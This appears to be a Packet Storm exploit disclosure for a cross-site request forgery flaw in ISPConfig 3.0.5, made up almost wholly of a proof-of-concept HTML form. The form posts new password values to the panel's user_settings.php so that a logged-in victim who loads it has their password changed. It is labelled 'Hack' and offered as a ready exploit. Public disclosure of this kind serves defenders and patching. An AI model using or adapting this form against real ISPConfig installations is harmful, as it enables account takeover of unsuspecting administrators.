ISPConfig version 3.0.5 suffers from a cross site request forgery vulnerability.
72d4c31c38899c900d1fc51244197309a707c46747e123307540c8cf61583920<!--
# Exploit Title: ISPConfig 3.0.5 (Change Password) CSRF Exploit
# Date: 11/07/2016
# Exploit Author: bl4ck_mohajem
# Vendor Homepage: http://www.ispconfig.org
# Version: 3.0.5
# Tested on: Ubuntu
# Introduction:
ISPconfig is an open source multilingual control panel which enables
you to manage multiple servers under one control panel.
#PoC :
-->
<form action="http://demo3.ispconfig.org/tools/user_settings.php" method="post">
<input name="passwort" value="" type="password">
<input name="repeat_password" value="" type="password">
<input type="hidden" name="language" value="en">
<input type="submit" value="Hack">
</form>
<!--
######################################################
#
#tanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky
############################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed